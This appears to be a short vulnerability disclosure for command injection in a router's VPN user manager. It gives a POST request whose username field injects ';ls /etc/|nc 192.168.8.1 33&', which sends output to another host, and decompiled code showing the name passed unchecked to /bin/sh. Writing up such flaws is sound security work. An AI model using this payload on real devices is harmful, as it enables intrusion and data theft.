In the router's web interface
Go the VPN Server List
Add a L2TP Server
Then go to the Server User Manager
Add a new User
Using the user name to inject shell code.
Post data to change the user name like:
post
http://192.168.1.1/stok=<your token>/ds
body
{"vpn":{"user_1":{"username":";ls /etc/|nc 192.168.8.1 33&","password":"aaaa1111","type":"l2tp","netmode":"client2lan","localip":"192.168.10.11","dns":"223.5.5.5","block":"0","ippool":"d1","maxsessions":"10"}},"method":"set"}
Then click disable in the web interface to trigger the shell code.
The code behind this
snprintf(
v20,
0x200uLL,
". /lib/vpn/user.sh; block_user %s %s %s &",
(const char *)&v19[11] + 2,
v16,
off_99D8A8[v19[65]]);
strncpy(v13, "vpnUserVerify", 0x1FuLL);
logOutput(v13, 0x479u, 0xBu, 1u, "VPN: command: %s\n", v20);
if ( (unsigned int)dbgPrintfMaskCheck(11LL) && (unsigned __int8)dbgPrintfLvlGet() <= 1u )
printf("\t%s(%d). command: %s\n\n", "vpnUserVerify", 1145LL, v20);
systemAsyncExec((__int64)v20);
if ( vfork()
|| (v10[0] = (__int64)"sh",
v10[1] = (__int64)"-c",
v10[2] = a1,
v10[3] = 0LL,
!(unsigned int)execve((__int64)"/bin/sh", (__int64)v10, (__int64)&v9)) )
{
v6 = 0;
}
else